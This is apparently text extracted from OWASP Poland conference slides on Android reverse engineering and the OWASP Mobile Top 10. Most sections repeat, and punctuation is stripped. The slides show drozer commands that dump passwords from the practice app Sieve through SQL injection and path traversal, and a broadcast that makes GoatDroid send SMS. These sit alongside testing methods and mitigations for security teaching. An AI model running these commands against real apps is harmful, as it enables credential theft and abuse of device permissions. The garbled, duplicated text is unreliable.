Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
